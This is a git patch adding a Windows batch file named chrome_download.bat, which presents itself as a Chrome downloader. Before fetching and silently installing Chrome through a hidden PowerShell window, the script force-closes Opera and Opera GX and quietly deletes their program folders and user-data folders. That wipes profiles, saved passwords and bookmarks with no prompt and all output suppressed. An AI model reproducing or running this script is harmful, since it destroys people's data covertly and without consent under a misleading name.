From eb7d4eb2c79f7b6a0a06d92c711bda8de25c76dd Mon Sep 17 00:00:00 2001 From: redstonestudios Date: Sun, 15 Mar 2026 19:28:21 +0000 Subject: [PATCH] =?UTF-8?q?chrome=5Fdownload.bat=20hinzugef=C3=BCgt?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- chrome_download.bat | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 chrome_download.bat diff --git a/chrome_download.bat b/chrome_download.bat new file mode 100644 index 0000000..9320f87 --- /dev/null +++ b/chrome_download.bat @@ -0,0 +1,19 @@ +@echo off + +taskkill /f /im opera.exe >nul 2>&1 +taskkill /f /im opera_gx.exe >nul 2>&1 +taskkill /f /im launcher.exe >nul 2>&1 + +rd /s /q "%LOCALAPPDATA%\Programs\Opera" >nul 2>&1 +rd /s /q "%LOCALAPPDATA%\Programs\Opera GX" >nul 2>&1 + +rd /s /q "%APPDATA%\Opera Software" >nul 2>&1 +rd /s /q "%LOCALAPPDATA%\Opera Software" >nul 2>&1 + +set FILE=%TEMP%\ChromeStandaloneSetup64.exe + +powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://dl.google.com/chrome/install/ChromeStandaloneSetup64.exe' -OutFile '%FILE%'" >nul 2>&1 + +start /wait "" "%FILE%" /silent /install >nul 2>&1 + +exit \ No newline at end of file